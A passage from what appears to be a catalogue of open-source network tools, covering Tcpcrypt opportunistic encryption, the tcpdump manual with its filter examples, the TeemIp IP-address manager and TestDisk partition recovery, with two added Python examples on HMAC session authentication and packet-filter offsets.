So why is now the right time to turn on encryption? Here are
some reasons:
Intercepting communications today is simpler than
ever because of wireless networks. Ask a hacker how
many e-mail passwords can be intercepted at an airport
by just using a wifi-enabled laptop. This unsophisticated
attack is in reach of many. The times when only a few elite
had the necessary skill to eavesdrop are gone.
Computers have now become fast enough to encrypt
all Internet traffic. New computers come with special
hardware crypto instructions that allow encrypted
networking speeds of 10Gbit/s. How many of us even
achieve those speeds on the Internet or would want to
download (and watch) one movie per second? Clearly, we
can encrypt fast enough.
Research advances and the lessons learnt from over
10 years of experience with the web finally enabled us
to design a protocol that can be used in today's
Internet, by today's users. Our protocol is pragmatic: it
requires no changes to applications, it works with NATs
(i.e., compatible with your DSL router), and will work even
if the other end has not yet upgraded to tcpcrypt, in which
case it will gracefully fall back to using the old plain-text
TCP. No user configuration is required, making it
accessible to lay users: no more obscure requests like
"Please generate a 2048-bit RSA-3 key and a certificate
request for signing by a CA". Tcpcrypt can be
incrementally deployed today, and with time the whole
Internet will become encrypted.
How Tcpcrypt works

Tcpcrypt is opportunistic encryption. If the other end speaks
Tcpcrypt, then your traffic will be encrypted; otherwise it will be
in clear text. Thus, Tcpcrypt alone provides no guarantees; it
is best effort. If, however, a Tcpcrypt connection is successful
and any attackers that exist are passive, then Tcpcrypt
guarantees privacy.
Network attackers come in two varieties: passive and active
(man-in-the-middle). Passive attacks are much simpler to
execute because they just require listening on the network.
Active attacks are much harder as they require listening and
modifying network traffic, often requiring very precise timing
that can make some attacks impractical.
By default Tcpcrypt is vulnerable to active attacks: an attacker
can, for example, modify a server's response to say that
Tcpcrypt is not supported (when in fact it is) so that all
subsequent traffic will be clear text and can thus be
eavesdropped on.
Tcpcrypt, however, is powerful enough to stop active attacks,
too, if the application using it performs authentication. For
example, if you log in to online banking using a password and
the connection is over Tcpcrypt, it is possible to use that shared
secret between you and the bank (i.e., the password) to
authenticate that you are actually speaking to the bank and not
some active (man-in-the-middle) attacker. The attacker cannot
spoof authentication as it lacks the password. Thus, by default,
Tcpcrypt will try its best to protect your traffic. Applications
requiring stricter guarantees can get them by authenticating a
Tcpcrypt session.
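The password-based authentication described above, shown as an added example; this is not code from the Tcpcrypt project, and the construction is a simplified model rather than Tcpcrypt's own mechanism. It assumes that each endpoint can read a per-connection session ID from its Tcpcrypt stack (modelled here as a random byte string), so that a relaying attacker necessarily holds two different sessions, one towards each side.

```python
"""Why application-level authentication over Tcpcrypt stops an active
attacker: bind the shared password to the Tcpcrypt session.

Simplified model (an assumption of this example, not Tcpcrypt's actual
mechanism): each endpoint can read a per-connection session ID from its
Tcpcrypt stack, and an attacker relaying the connection ends up with two
distinct sessions, one towards the client and one towards the server."""
import hashlib
import hmac
import os


def session_tag(password: bytes, session_id: bytes, role: str) -> bytes:
    """HMAC-SHA256 over the session ID, keyed with the password. The role
    label keeps the client's and server's tags distinct, so a tag one side
    sent cannot be reflected back to it as the other side's proof."""
    return hmac.new(password, role.encode() + b"|" + session_id, hashlib.sha256).digest()


def verify_tag(password: bytes, session_id: bytes, role: str, tag: bytes) -> bool:
    """Constant-time comparison against the tag this side expects for its own session."""
    return hmac.compare_digest(session_tag(password, session_id, role), tag)


def authenticate(client_sid: bytes, server_sid: bytes,
                 client_pw: bytes, server_pw: bytes) -> bool:
    """Mutual check: the client proves over the session it sees, the server
    over the session it sees. Tags pass through whatever sits in the middle
    unchanged, because without the password they cannot be recomputed."""
    from_client = session_tag(client_pw, client_sid, "client")
    from_server = session_tag(server_pw, server_sid, "server")
    server_ok = verify_tag(server_pw, server_sid, "client", from_client)
    client_ok = verify_tag(client_pw, client_sid, "server", from_server)
    return server_ok and client_ok


def direct_session(password: bytes = b"correct horse battery") -> bool:
    """Nobody in the middle: both endpoints see the same session ID."""
    sid = os.urandom(32)
    return authenticate(sid, sid, password, password)


def relayed_session(password: bytes = b"correct horse battery") -> bool:
    """An active attacker terminates the client's session and opens its own
    to the server: the two session IDs differ, so neither tag verifies."""
    return authenticate(os.urandom(32), os.urandom(32), password, password)


def wrong_password_session() -> bool:
    """Same session on both ends, but the client does not know the password."""
    sid = os.urandom(32)
    return authenticate(sid, sid, b"guess", b"correct horse battery")


if __name__ == "__main__":
    print("direct:", direct_session())            # True
    print("relayed:", relayed_session())          # False
    print("wrong password:", wrong_password_session())  # False
```

The point of the example is the binding: the password never leaves either host, a passive observer sees only HMAC tags, and the tag only verifies on the exact session it was computed for, which is what defeats the relay.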
How Tcpcrypt is different

Some of us already encrypt some network traffic using SSL
(e.g., HTTPS) or VPNs. Those solutions are inadequate for
ubiquitous encryption. For example, almost all solutions rely on
a PKI to stop man-in-the-middle attacks, which for ubiquitous
deployment would mean that all Internet users would have to
get verified by a CA like Verisign and have to spend money to
buy a certificate. Tcpcrypt abstracts away authentication,
allowing any mechanism to be used, whether PKI, passwords,
or something else.
Next, Tcpcrypt can be incrementally deployed: it has a
mechanism for probing support and can gracefully fall back to
TCP. It also requires no configuration (try that with a VPN!) and
has no NAT issues. Finally, Tcpcrypt has very high
performance (up to 25x faster than SSL), making it feasible for
high volume servers to enable encryption on all connections.
While weaker by default, Tcpcrypt is more realistic for universal
deployment.
We can easily make the bar much higher for attackers, so let's
do it. How much longer are we going to stay clear-text by
default?

Download Tcpcrypt
TCPDUMP - DUMP TRAFFIC ON A NETWORK

Tcpdump allows you to dump the traffic on a network. It can be
used to print out the headers and/or contents of packets on a
network interface that match a given expression. You can
use this tool to track down network problems, to detect many
attacks, or to monitor the network activities.
Tcpdump prints out a description of the contents of packets on
a network interface that match the boolean expression; the
description is preceded by a time stamp, printed, by default, as
hours, minutes, seconds, and fractions of a second since
midnight. It can also be run with the -w flag, which causes it to
save the packet data to a file for later analysis, and/or with the
-r flag, which causes it to read from a saved packet file rather
than to read packets from a network interface. It can also be
run with the -V flag, which causes it to read a list of saved
packet files. In all cases, only packets that match expression
will be processed by tcpdump.
Tcpdump will, if not run with the -c flag, continue capturing
packets until it is interrupted by a SIGINT signal (generated, for
example, by typing your interrupt character, typically control-C)
or a SIGTERM signal (typically generated with the kill(1)
command); if run with the -c flag, it will capture packets until it
is interrupted by a SIGINT or SIGTERM signal or the specified
number of packets have been processed.
When tcpdump finishes capturing packets, it will report counts
of:
packets ``captured'' (this is the number of packets that tcpdump
has received and processed);
packets ``received by filter'' (the meaning of this depends on
the OS on which you're running tcpdump, and possibly on the
way the OS was configured - if a filter was specified on the
command line, on some OSes it counts packets regardless of
whether they were matched by the filter expression and, even if
they were matched by the filter expression, regardless of
whether tcpdump has read and processed them yet; on other
OSes it counts only packets that were matched by the filter
expression, regardless of whether tcpdump has read and
processed them yet; and on other OSes it counts only packets
that were matched by the filter expression and were processed
by tcpdump);
packets ``dropped by kernel'' (this is the number of packets that
were dropped, due to a lack of buffer space, by the packet
capture mechanism in the OS on which tcpdump is running, if
the OS reports that information to applications; if not, it will be
reported as 0).
On platforms that support the SIGINFO signal, such as most
BSDs (including Mac OS X) and Digital/Tru64 UNIX, it will
report those counts when it receives a SIGINFO signal
(generated, for example, by typing your ``status'' character,
typically control-T, although on some platforms, such as Mac
OS X, the ``status'' character is not set by default, so you must
set it with stty(1) in order to use it) and will continue capturing
packets. On platforms that do not support the SIGINFO signal,
the same can be achieved by using the SIGUSR1 signal.
Reading packets from a network interface may require that you
have special privileges; see the pcap (3PCAP) man page for
details. Reading a saved packet file doesn't require special
privileges.

OPTIONS
-A
Print each packet (minus its link level header) in ASCII. Handy
for capturing web pages.
-b
Print the AS number in BGP packets in ASDOT notation rather
than ASPLAIN notation.
-B buffer_size
--buffer-size=buffer_size
Set the operating system capture buffer size to buffer_size, in
units of KiB (1024 bytes).
-c count
Exit after receiving count packets.

-C file_size
Before writing a raw packet to a savefile, check whether the file
is currently larger than file_size and, if so, close the current
savefile and open a new one. Savefiles after the first savefile
will have the name specified with the -w flag, with a number
after it, starting at 1 and continuing upward. The units of
file_size are millions of bytes (1,000,000 bytes, not 1,048,576
bytes).
-d
Dump the compiled packet-matching code in a human readable
form to standard output and stop.
-dd
Dump packet-matching code as a C program fragment.
-ddd
Dump packet-matching code as decimal numbers (preceded
with a count).
-D
--list-interfaces
Print the list of the network interfaces available on the system
and on which tcpdump can capture packets. For each network
interface, a number and an interface name, possibly followed
by a text description of the interface, is printed. The interface
name or the number can be supplied to the -i flag to specify an
interface on which to capture.
This can be useful on systems that don't have a command to
list them (e.g., Windows systems, or UNIX systems lacking
ifconfig -a); the number can be useful on Windows 2000 and
later systems, where the interface name is a somewhat
complex string.
The -D flag will not be supported if tcpdump was built with an
older version of libpcap that lacks the pcap_findalldevs()
function.
-e
Print the link-level header on each dump line. This can be used,
for example, to print MAC layer addresses for protocols such as
Ethernet and IEEE 802.11.
-E
Use spi@ipaddr algo:secret for decrypting IPsec ESP packets
that are addressed to addr and contain Security Parameter
Index value spi. This combination may be repeated with comma
or newline separation.
Note that setting the secret for IPv4 ESP packets is supported
at this time.
Algorithms may be des-cbc, 3des-cbc, blowfish-cbc, rc3-cbc,
cast128-cbc, or none. The default is des-cbc. The ability
to decrypt packets is only present if tcpdump was compiled with
cryptography enabled.
secret is the ASCII text for ESP secret key. If preceded by 0x,
then a hex value will be read.
The option assumes RFC2406 ESP, not RFC1827 ESP. The
option is only for debugging purposes, and the use of this
option with a true `secret' key is discouraged. By presenting
IPsec secret key onto command line you make it visible to
others, via ps(1) and other occasions.
In addition to the above syntax, the syntax file name may be
used to have tcpdump read the provided file in. The file is
opened upon receiving the first ESP packet, so any special
permissions that tcpdump may have been given should already
have been given up.
-f
Print `foreign' IPv4 addresses numerically rather than
symbolically (this option is intended to get around serious brain
damage in Sun's NIS server --- usually it hangs forever
translating non-local internet numbers).

The test for `foreign' IPv4 addresses is done using the IPv4
address and netmask of the interface on which capture is being
done. If that address or netmask are not available, either
either because the interface on which capture is being done
has no address or netmask or because the capture is being
done on the Linux "any" interface, which can capture on more
than one interface, this option will not work correctly.
-F file
Use file as input for the filter expression. An additional
expression given on the command line is ignored.
-G rotate_seconds
If specified, rotates the dump file specified with the -w option
every rotate_seconds seconds. Savefiles will have the name
specified by -w which should include a time format as defined
by strftime(3). If no time format is specified, each new file will
overwrite the previous.
If used in conjunction with the -C option, filenames will take the
form of `file<count>'.
-h
--help
Print the tcpdump and libpcap version strings, print a usage
message, and exit.
--version
Print the tcpdump and libpcap version strings and exit.
-H
Attempt to detect 802.11s draft mesh headers.
-i interface
--interface=interface
Listen on interface. If unspecified, tcpdump searches the
system interface list for the lowest numbered, configured up
interface (excluding loopback), which may turn out to be, for
example, ``eth0''.
On Linux systems with 2.2 or later kernels, an interface
argument of ``any'' can be used to capture packets from all
interfaces. Note that captures on the ``any'' device will not be
done in promiscuous mode.
If the -D flag is supported, an interface number as printed by
that flag can be used as the interface argument.
-I
--monitor-mode
Put the interface in "monitor mode"; this is supported only on
IEEE 802.11 Wi-Fi interfaces, and supported only on some
operating systems.
Note that in monitor mode the adapter might disassociate from
the network with which it's associated, so that you will not be
able to use any wireless networks with that adapter. This could
prevent accessing files on a network server, or resolving host
names or network addresses, if you are capturing in monitor
mode and are not connected to another network with another
adapter.
This flag will affect the output of the -L flag. If -I isn't specified,
only those link-layer types available when not in monitor mode
will be shown; if -I is specified, only those link-layer types
available when in monitor mode will be shown.
--immediate-mode
Capture in "immediate mode". In this mode, packets are
delivered to tcpdump as soon as they arrive, rather than being
buffered for efficiency. This is the default when printing packets
rather than saving packets to a ``savefile'' if the packets are
being printed to a terminal rather than to a file or pipe.
-j tstamp_type
--time-stamp-type=tstamp_type
Set the time stamp type for the capture to tstamp_type. The
names to use for the time stamp types are given in
pcap-tstamp(7); not all the types listed there will necessarily be valid
for any given interface.
-J
--list-time-stamp-types
List the supported time stamp types for the interface and exit. If
the time stamp type cannot be set for the interface, no time
stamp types are listed.
--time-stamp-precision=tstamp_precision
When capturing, set the time stamp precision for the capture to
tstamp_precision. Note that availability of high precision time
stamps (nanoseconds) and their actual accuracy is platform
and hardware dependent. Also note that when writing captures
made with nanosecond accuracy to a savefile, the time stamps
are written with nanosecond resolution, and the file is written
with a different magic number, to indicate that the time stamps
are in seconds and nanoseconds; not all programs that read
pcap savefiles will be able to read those captures.
When reading a savefile, convert time stamps to the precision
specified by timestamp_precision, and display them with that
resolution. If the precision specified is less than the precision of
time stamps in the file, the conversion will lose precision.
The supported values for timestamp_precision are micro for
microsecond resolution and nano for nanosecond resolution.
The default is microsecond resolution.
-K
--dont-verify-checksums
Don't attempt to verify IP, TCP, or UDP checksums. This is
useful for interfaces that perform some or all of those checksum
calculation in hardware; otherwise, all outgoing TCP
checksums will be flagged as bad.
-l
Make stdout line buffered. Useful if you want to see the data
while capturing it. E.g.,
tcpdump -l | tee dat
or
tcpdump -l > dat & tail -f dat
Note that on Windows, ``line buffered'' means ``unbuffered'', so
that WinDump will write each character individually if -l is
specified.
-U is similar to -l in its behavior, but it will cause output to be
``packet-buffered'', so that the output is written to stdout at the
end of each packet rather than at the end of each line; this is
buffered on all platforms, including Windows.
-L
--list-data-link-types
List the known data link types for the interface, in the specified
mode, and exit. The list of known data link types may be
dependent on the specified mode; for example, on some
platforms, a Wi-Fi interface might support one set of data link
types when not in monitor mode (for example, it might support
only fake Ethernet headers, or might support 802.11 headers
but not support 802.11 headers with radio information) and
another set of data link types when in monitor mode (for
example, it might support 802.11 headers, or 802.11 headers
with radio information, only in monitor mode).
-m module
Load SMI MIB module definitions from file module. This option
can be used several times to load several MIB modules into
tcpdump.
-M secret
Use secret as a shared secret for validating the digests found in
TCP segments with the TCP-MD5 option (RFC 2385), if
present.
-n
Don't convert addresses (i.e., host addresses, port numbers,
etc.) to names.
-N
Don't print domain name qualification of host names. E.g., if
you give this flag then tcpdump will print ``nic'' instead of
``nic.ddn.mil''.
-#
--number
Print an optional packet number at the beginning of the line.
-O
--no-optimize
Do not run the packet-matching code optimizer. This is useful
only if you suspect a bug in the optimizer.
-p
--no-promiscuous-mode
Don't put the interface into promiscuous mode. Note that the
interface might be in promiscuous mode for some other reason;
hence, `-p' cannot be used as an abbreviation for `ether host
{local-hw-addr} or ether broadcast'.
-Q direction
--direction=direction
Choose send/receive direction direction for which packets
should be captured. Possible values are `in', `out' and `inout'.
Not available on all platforms.
-q
Quick (quiet?) output. Print less protocol information so output
lines are shorter.
-R
Assume ESP/AH packets to be based on old specification
(RFC1825 to RFC1829). If specified, tcpdump will not print
replay prevention field. Since there is no protocol version field
in ESP/AH specification, tcpdump cannot deduce the version of
ESP/AH protocol.
-r file
Read packets from file (which was created with the -w option or
by other tools that write pcap or pcap-ng files). Standard input
is used if file is ``-''.
-S
--absolute-tcp-sequence-numbers
Print absolute, rather than relative, TCP sequence numbers.
-s snaplen
--snapshot-length=snaplen
Snarf snaplen bytes of data from each packet rather than the
default of 65535 bytes. Packets truncated because of a limited
snapshot are indicated in the output with ``[|proto]'', where proto
is the name of the protocol level at which the truncation has
occurred. Note that taking larger snapshots both increases the
amount of time it takes to process packets and, effectively,
decreases the amount of packet buffering. This may cause
packets to be lost. You should limit snaplen to the smallest
number that will capture the protocol information you're
interested in. Setting snaplen to 0 sets it to the default of
65535, for backwards compatibility with recent older versions of
tcpdump.
-T type
Force packets selected by "expression" to be interpreted the
specified type. Currently known types are aodv (Ad-hoc On-demand
Distance Vector protocol), carp (Common Address
Redundancy Protocol), cnfp (Cisco NetFlow protocol), lmp
(Link Management Protocol), pgm (Pragmatic General
Multicast), pgm_zmtp1 (ZMTP/1.0 inside PGM/EPGM), radius
(RADIUS), rpc (Remote Procedure Call), rtp (Real-Time
Applications protocol), rtcp (Real-Time Applications control
protocol), snmp (Simple Network Management Protocol), tftp
(Trivial File Transfer Protocol), vat (Visual Audio Tool), wb
(distributed White Board), zmtp1 (ZeroMQ Message Transport
Protocol 1.0) and vxlan (Virtual eXtensible Local Area
Network).
Note that the pgm type above affects UDP interpretation only,
the native PGM is always recognised as IP protocol 113
regardless. UDP-encapsulated PGM is often called "EPGM" or
"PGM/UDP".
Note that the pgm_zmtp1 type above affects interpretation of
both native PGM and UDP at once. During the native PGM
decoding the application data of an ODATA/RDATA packet
would be decoded as a ZeroMQ datagram with ZMTP/1.0
frames. During the UDP decoding in addition to that any UDP
packet would be treated as an encapsulated PGM packet.
-t
Don't print a timestamp on each dump line.
-tt
Print the timestamp, as seconds since January 1, 1970,
00:00:00, UTC, and fractions of a second since that time, on
each dump line.
-ttt
Print a delta (micro-second resolution) between current and
previous line on each dump line.
-tttt
Print a timestamp, as hours, minutes, seconds, and fractions of
a second since midnight, preceded by the date, on each dump
line.
-ttttt
Print a delta (micro-second resolution) between current and first
line on each dump line.

-u
Print undecoded NFS handles.
-U
--packet-buffered
If the -w option is not specified, make the printed packet output
``packet-buffered''; i.e., as the description of the contents of
each packet is printed, it will be written to the standard output,
rather than, when not writing to a terminal, being written only
when the output buffer fills.
If the -w option is specified, make the saved raw packet output
``packet-buffered''; i.e., as each packet is saved, it will be
written to the output file, rather than being written only when the
output buffer fills.
The -U flag will not be supported if tcpdump was built with an
older version of libpcap that lacks the pcap_dump_flush()
function.
-v
When parsing and printing, produce (slightly more) verbose
output. For example, the time to live, identification, total length
and options in an IP packet are printed. Also enables additional
packet integrity checks such as verifying the IP and ICMP
header checksum.
When writing to a file with the -w option, report, every 10
seconds, the number of packets captured.
-vv
Even more verbose output. For example, additional fields are
printed from NFS reply packets, and SMB packets are fully
decoded.
-vvv
Even more verbose output. For example, telnet SB ... SE
options are printed in full. With -X Telnet options are printed in
hex as well.

-V file
Read a list of filenames from file. Standard input is used if file is
``-''.
-w file
Write the raw packets to file rather than parsing and printing
them out. They can later be printed with the -r option. Standard
output is used if file is ``-''.
This output will be buffered if written to a file or pipe, so a
program reading from the file or pipe may not see packets for
an arbitrary amount of time after they are received. Use the -U
flag to cause packets to be written as soon as they are
received.
The MIME type application/vnd.tcpdump.pcap has been
registered with IANA for pcap files. The filename
extension .pcap appears to be the most commonly used along
with .cap and .dmp. Tcpdump itself doesn't check the extension
when reading capture files and doesn't add an extension when
writing them (it uses magic numbers in the file header instead).
However, many operating systems and applications will use the
extension if it is present and adding one (e.g. .pcap) is
recommended.
See pcap-savefile(5) for a description of the file format.
-W
Used in conjunction with the -C option, this will limit the number
of files created to the specified number, and begin overwriting
files from the beginning, thus creating a 'rotating' buffer. In
addition, it will name the files with enough leading 0s to support
the maximum number of files, allowing them to sort correctly.
Used in conjunction with the -G option, this will limit the number
of rotated dump files that get created, exiting with status 0
when reaching the limit. If used with -C as well, the behavior
will result in cyclical files per timeslice.

-x
When parsing and printing, in addition to printing the headers of
each packet, print the data of each packet (minus its link level
header) in hex. The smaller of the entire packet or snaplen
bytes will be printed. Note that this is the entire link-layer
packet, so for link layers that pad (e.g. Ethernet), the padding
bytes will also be printed when the higher layer packet is
shorter than the required padding.
-xx
When parsing and printing, in addition to printing the headers of
each packet, print the data of each packet, including its link
level header, in hex.
-X
When parsing and printing, in addition to printing the headers of
each packet, print the data of each packet (minus its link level
header) in hex and ASCII. This is very handy for analysing new
protocols.
-XX
When parsing and printing, in addition to printing the headers of
each packet, print the data of each packet, including its link
level header, in hex and ASCII.
-y datalinktype
--linktype=datalinktype
Set the data link type to use while capturing packets to
datalinktype.
-z postrotate-command
Used in conjunction with the -C or -G options, this will make
tcpdump run " postrotate-command file " where file is the
savefile being closed after each rotation. For example,
specifying -z gzip or -z bzip2 will compress each savefile using
gzip or bzip2.
Note that tcpdump will run the command in parallel to the
capture, using the lowest priority so that this doesn't disturb the
capture process.

And in case you would like to use a command that itself takes
flags or different arguments, you can always write a shell script
that will take the savefile name as the only argument, make the
flags & arguments arrangements and execute the command
that you want.
-Z user
--relinquish-privileges=user
If tcpdump is running as root, after opening the capture device
or input savefile, but before opening any savefiles for output,
change the user ID to user and the group ID to the primary
group of user.
This behavior can also be enabled by default at compile time.
expression
selects which packets will be dumped. If no expression is given,
all packets on the net will be dumped. Otherwise, only packets
for which expression is `true' will be dumped. For the
expression syntax, see pcap-filter(7).
The expression argument can be passed to tcpdump as either
a single Shell argument, or as multiple Shell arguments,
whichever is more convenient. Generally, if the expression
contains Shell metacharacters, such as backslashes used to
escape protocol names, it is easier to pass it as a single,
quoted argument rather than to escape the Shell
metacharacters. Multiple arguments are concatenated with
spaces before being parsed.

EXAMPLES
To print all packets arriving at or departing from sundown:
tcpdump host sundown
To print traffic between helios and either hot or ace:
tcpdump host helios and \( hot or ace \)
To print all IP packets between ace and any host except helios:
tcpdump ip host ace and not helios
To print all traffic between local hosts and hosts at Berkeley:
tcpdump net ucb-ether
To print all ftp traffic through internet gateway snup (note that
the expression is quoted to prevent the shell from
(mis-)interpreting the parentheses):
tcpdump 'gateway snup and (port ftp or ftp-data)'
To print traffic neither sourced from nor destined for local hosts
(if you gateway to one other net, this stuff should never make it
onto your local net):
tcpdump ip and not net localnet
To print the start and end packets (the SYN and FIN packets)
of each TCP conversation that involves a non-local host:
tcpdump 'tcp[tcpflags] & (tcp-syn|tcp-fin) != 0 and not src
and dst net localnet'
To print all IPv4 HTTP packets to and from port 80, i.e. print
only packets that contain data, not, for example, SYN and FIN
packets and ACK-only packets. (IPv6 is left as an exercise for
the reader.)
tcpdump 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'
To print IP packets longer than 576 bytes sent through gateway
snup:
tcpdump 'gateway snup and ip[2:2] > 576'
To print IP broadcast or multicast packets that were not sent via
Ethernet broadcast or multicast:
tcpdump 'ether[0] & 1 = 0 and ip[16] >= 224'
To print all ICMP packets that are not echo requests/replies
(i.e., not ping packets):
tcpdump 'icmp[icmptype] != icmp-echo and
icmp[icmptype] != icmp-echoreply'
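The byte-offset filters in the examples above (the port-80 "packets with data" expression, tcp[tcpflags], ip[16] >= 224, ip[2:2] > 576) are easy to get wrong, so here is an added example, not part of tcpdump or its manual, that builds IPv4/TCP packets in memory and evaluates those same expressions against them with the offsets pcap-filter uses. The packet builder, the sample addresses (documentation ranges) and the request payload are constructed for this example.

```python
"""Evaluate some of the tcpdump filter expressions from the EXAMPLES
section against packets built in memory, using the byte offsets the
pcap-filter language uses: ip[off:size] indexes the IPv4 header and
tcp[off:size] indexes the TCP header (which starts right after the
variable-length IP header)."""
import struct

# pcap-filter names used in the expressions above; tcpflags is TCP byte 13
TCP_FIN, TCP_SYN, TCP_PSH, TCP_ACK = 0x01, 0x02, 0x08, 0x10
TCPFLAGS = 13


def build_ipv4_tcp(src, dst, sport, dport, flags, payload=b"", ip_options=b""):
    """Constructed sample packet: IPv4 header (+ optional options),
    TCP header, payload. No link-layer header; checksums left as zero,
    which the filter code never inspects."""
    assert len(ip_options) % 4 == 0, "IP options are padded to 32-bit words"
    ihl = 5 + len(ip_options) // 4
    total_len = ihl * 4 + 20 + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s",
                     (4 << 4) | ihl, 0, total_len, 0, 0, 64, 6, 0,
                     bytes(int(o) for o in src.split(".")),
                     bytes(int(o) for o in dst.split("."))) + ip_options
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 65535, 0, 0)
    return ip + tcp + payload


def ip_field(pkt, off, size=1):
    """ip[off:size]: big-endian integer read at an IP-header offset."""
    return int.from_bytes(pkt[off:off + size], "big")


def tcp_field(pkt, off, size=1):
    """tcp[off:size]: the TCP header begins after (ip[0]&0xf)<<2 bytes."""
    base = (pkt[0] & 0x0F) << 2
    return int.from_bytes(pkt[base + off:base + off + size], "big")


def tcp_payload_length(pkt):
    """(ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2):
    IP total length minus IP header length minus TCP header length."""
    ip_hdr_len = (ip_field(pkt, 0) & 0x0F) << 2
    tcp_hdr_len = (tcp_field(pkt, 12) & 0xF0) >> 2
    return (ip_field(pkt, 2, 2) - ip_hdr_len) - tcp_hdr_len


def matches_http_with_data(pkt):
    """'tcp port 80 and (<payload length> != 0)': HTTP segments carrying
    data, so handshake and bare ACK segments are excluded."""
    on_port_80 = tcp_field(pkt, 0, 2) == 80 or tcp_field(pkt, 2, 2) == 80
    return on_port_80 and tcp_payload_length(pkt) != 0


def matches_syn_or_fin(pkt):
    """'tcp[tcpflags] & (tcp-syn|tcp-fin) != 0'."""
    return tcp_field(pkt, TCPFLAGS) & (TCP_SYN | TCP_FIN) != 0


def matches_ip_bcast_or_mcast(pkt):
    """'ip[16] >= 224': first octet of the destination address is 224..255."""
    return ip_field(pkt, 16) >= 224


def matches_longer_than(pkt, limit=576):
    """'ip[2:2] > 576': IP total length exceeds the limit."""
    return ip_field(pkt, 2, 2) > limit


# Constructed sample traffic (addresses are documentation ranges).
REQUEST = b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n"
SYN = build_ipv4_tcp("192.0.2.10", "198.51.100.5", 40000, 80, TCP_SYN)
ACK_ONLY = build_ipv4_tcp("192.0.2.10", "198.51.100.5", 40000, 80, TCP_ACK)
DATA = build_ipv4_tcp("192.0.2.10", "198.51.100.5", 40000, 80, TCP_PSH | TCP_ACK, REQUEST)
# Same request with 8 bytes of IP options (NOPs): the ihl arithmetic must absorb them
DATA_OPTS = build_ipv4_tcp("192.0.2.10", "198.51.100.5", 40000, 80,
                           TCP_PSH | TCP_ACK, REQUEST, b"\x01" * 8)
MCAST = build_ipv4_tcp("192.0.2.10", "224.0.0.251", 5353, 5353, TCP_ACK)
BIG = build_ipv4_tcp("192.0.2.10", "198.51.100.5", 40000, 80, TCP_ACK, b"A" * 600)

if __name__ == "__main__":
    for name, pkt in [("SYN", SYN), ("ACK_ONLY", ACK_ONLY), ("DATA", DATA),
                      ("DATA_OPTS", DATA_OPTS), ("MCAST", MCAST), ("BIG", BIG)]:
        print(f"{name:9s} payload={tcp_payload_length(pkt):4d} "
              f"http_data={matches_http_with_data(pkt)} syn_fin={matches_syn_or_fin(pkt)} "
              f"mcast={matches_ip_bcast_or_mcast(pkt)} big={matches_longer_than(pkt)}")
```

The DATA_OPTS packet is the case worth remembering: a filter written as `ip[2:2] - 40 != 0` would break as soon as IP options appear, which is why the manual's expression derives both header lengths from the packet itself. The same offsets apply to a real capture; only the link-layer header, absent here, shifts the base tcpdump uses internally.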

Download Tcpdump
TEEMIP - IP ADDRESS MANAGEMENT SOLUTION

All network administrators do recognize how important it is to
have a well managed IP space: a comprehensive and up to
date inventory of all subnets and IPs used in a network as well
as clear and simple processes to request, change or release
IPs are underlying key factors for a trouble free network.
Unfortunately, in many companies or organizations, IP
Management is not perceived as a critical service of IT
operations. And when it is recognized as such, the price of
standard solutions sold by software vendors is so high that
investment in a tool is always postponed to the next fiscal
year.
As a consequence, network administrators often struggle to
keep a decent inventory of their IP space and they rely by
default on inconvenient Excel spreadsheets or DNS
configuration files to do their job.
The TeemIp application has been created precisely to answer that
problem. It is a robust Open Source web 2.0 solution that
enables professional IP Management activity within IT
departments of all sizes.
A simple and powerful user interface will allow network
administrators to manage their IPv4 and IPv6 Plans, subnet
space and IPs in accordance with best in class IP Management
practices:
Define your IPv4 and IPv6 Plans through hierarchical
Network Blocks
Delegate IP blocks from parent to child organizations
Manage Subnets within predefined Network Blocks
Attach IP Ranges to your Subnets
Register IPs and get a clear view on the IP space
consumption
Allow end user to log IP requests through a simple WEB
portal
Provide Hostmasters efficient processes to manage user
requests
Proactively notify administrators on key events
Synchronize your data with external tools
Because IPs are configured on network devices, a CMDB
(Configuration Management Data Base) has been included in
the product. This CMDB allows you to document all types of
devices that can be connected to an IP network together with
their linkage toward the IP space (IPs they use, like
management IPs, or IPs they host, like on router interfaces).
In order to provide the end users an easy way to log IP
related requests, a WEB portal has been incorporated into
TeemIp. Tickets created through that portal are then processed
through a Helpdesk module, thus providing the network
administrator a quick, efficient and easy process to allocate,
change or release IP resources.
TeemIp has been developed as an extension of the iTop open
source ITSM and CMDB software and therefore benefits from
all its features and advanced functions. It is available as a
standalone application or as a module that can be installed on
an already working iTop solution.
The TeemIp application relies on Apache, MySQL and PHP, so
it can run on whatever operating system supports those
applications: it has already been tested on Windows, Linux
Debian and Redhat. Because it is a web based application you
don't need to install any client on user PCs. A simple web
browser is enough to use it.

Download TeemIp
TESTDISK - PARTITION RECOVERY AND FILE UNDELETE
FOR WINDOWS, LINUX AND MAC

TestDisk is powerful free data recovery software! It was
primarily designed to help recover lost partitions and/or make
non-booting disks bootable again when these symptoms are
caused by faulty software: certain types of viruses or human
error (such as accidentally deleting a Partition Table). Partition
table recovery using TestDisk is really easy.
TestDisk can:
Fix partition table, recover deleted partition
Recover FAT32 boot sector from its backup
Rebuild FAT12/FAT16/FAT32 boot sector
Fix FAT tables
Rebuild NTFS boot sector
Recover NTFS boot sector from its backup
Fix MFT using MFT mirror
Locate ext2/ext3/ext4 Backup SuperBlock
Undelete files from FAT, exFAT, NTFS and ext2
filesystem
Copy files from deleted FAT, exFAT, NTFS and ext2/ext3/
ext4 partitions.
TestDisk has features for both novices and experts. For those
who know little or nothing about data recovery techniques,
TestDisk can be used to collect detailed information about a
non-booting drive which can then be sent to a tech for further
analysis. Those more familiar with such procedures should find
TestDisk a handy tool in performing onsite recovery.
Operating systems

TestDisk can run under
DOS (either real or in a Windows 9x DOS-box),
Windows (NT4, 2000, XP, 2003, Vista, 2008, Windows 7
(x86 & x64)),
Linux,
FreeBSD, NetBSD, OpenBSD,
SunOS and
MacOS X
Filesystems

TestDisk can find lost partitions for all of these file systems:
BeFS ( BeOS )
BSD disklabel ( FreeBSD/OpenBSD/NetBSD )
CramFS, Compressed File System
DOS/Windows FAT12, FAT16 and FAT32
XBox FATX
Windows exFAT
HFS, HFS+ and HFSX, Hierarchical File System
JFS, IBM's Journaled File System
Linux btrfs
Linux ext2, ext3 and ext4
Linux GFS2
Linux LUKS encrypted partition
